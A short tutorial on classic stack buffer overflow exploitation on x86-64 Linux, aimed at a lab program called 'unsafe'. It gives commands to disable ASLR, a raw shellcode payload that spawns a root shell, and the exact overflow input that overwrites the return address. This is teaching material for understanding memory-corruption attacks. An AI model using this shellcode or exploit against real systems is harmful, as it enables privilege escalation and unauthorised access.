# Shellcode injection on x86-64 Linux

Before we can use this exploit, we need to disable Address Space Layout Randomization (ASLR) at
kernel level

```
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

The shellcode below is intended for an x86 64 bit Linux machine. It can be stored in an environment
variable with the following command:

```
export SHELLCODE=`perl -e 'print "\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05"'`
```

To obtain the address of the environment variable, you can use the `getenvaddr` program. Provide the
name of the variable and the program you want to run as input arguments.

```
./getenvaddr SHELLCODE ./unsafe
SHELLCODE will be at 0x7fffffffe37a
```

The `copy` function from `unsafe.c` will have the following stack layout from low addresses to high
addresses:

| Top of stack |
| ------------ |
| str          |
| buffer       |
| SFP          |
| Return addr  |

The buffer can contain 12 bytes and the Saved Frame Pointer (SFP) is 8 bytes on a 64 bit machine
(like any pointer). Than means we need to provide 20 bytes of dummy data to our program before we
can overwrite the return address. Based on the location of the `SHELLCODE` variable in this example,
we can use the following command:

```
./unsafe $(perl -e 'print "\x41"x20 . "\x7a\xe3\xff\xff\xff\x7f\x00\x00"')
```

